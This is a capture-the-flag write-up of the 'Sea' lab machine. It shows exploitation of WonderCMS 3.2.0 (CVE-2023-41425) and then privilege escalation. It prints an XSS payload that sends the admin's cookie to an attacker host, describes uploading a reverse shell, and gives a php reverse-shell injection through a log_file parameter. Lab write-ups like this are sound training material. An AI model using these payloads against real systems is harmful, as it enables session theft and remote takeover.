User flag


Firtsly, sea.htb is built from wondercms. You can check it by enumerating the web or searching the string velik71 appeared on the banner.

Checking the /themes/bike/wcms-modules.json, I found the version of this website is 3.2.0. It has a CVE-2023-41425 that allows an attacker to a remote attacker to execute arbitrary code via a crafted script uploaded to the installModule component.

I also found a contact.php page which allows us to send infomation including a malicous link to the admin.


I use the contact.php page to send a link to the admin to steal the cookie.

http://sea.htb/index.php?page="></form><script>fetch('http://<ip>:<port>?cookie='+document.cookie)</script><form action="

Use this cookie to access the admin page

Use the installModule to upload a reverse shell to the server and access the server as www-data.


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Enumerate current directory, I found a database.js file in /var/www/sea/data which contains the Bcrypt hash of password. Use john to crack it and it is password of amay. alt text

Get the user flag at /home/amay/user.txt

Root flag

List listened ports opened:

netstat -tulnp | grep LISTEN

The local host is running a web on port 8080. I use ssh tunnel to access it.

ssh -L 8081: amay@

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The web is a System Monitor page. The page get the log_file parameter to read the file and filter the content. It may uses shell script with php system function like system or passthru,… to read the file. To get flag, I modified the log_file param to shell script to read the root flag and send it to my server.

; php -r '$sock=fsockopen("",9000);`/bin/sh <&3 >&3 2>&3`;'

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The shell last for a few seconds, so you can change /bin/sh to cat /root/root.txt to get the root flag. alt text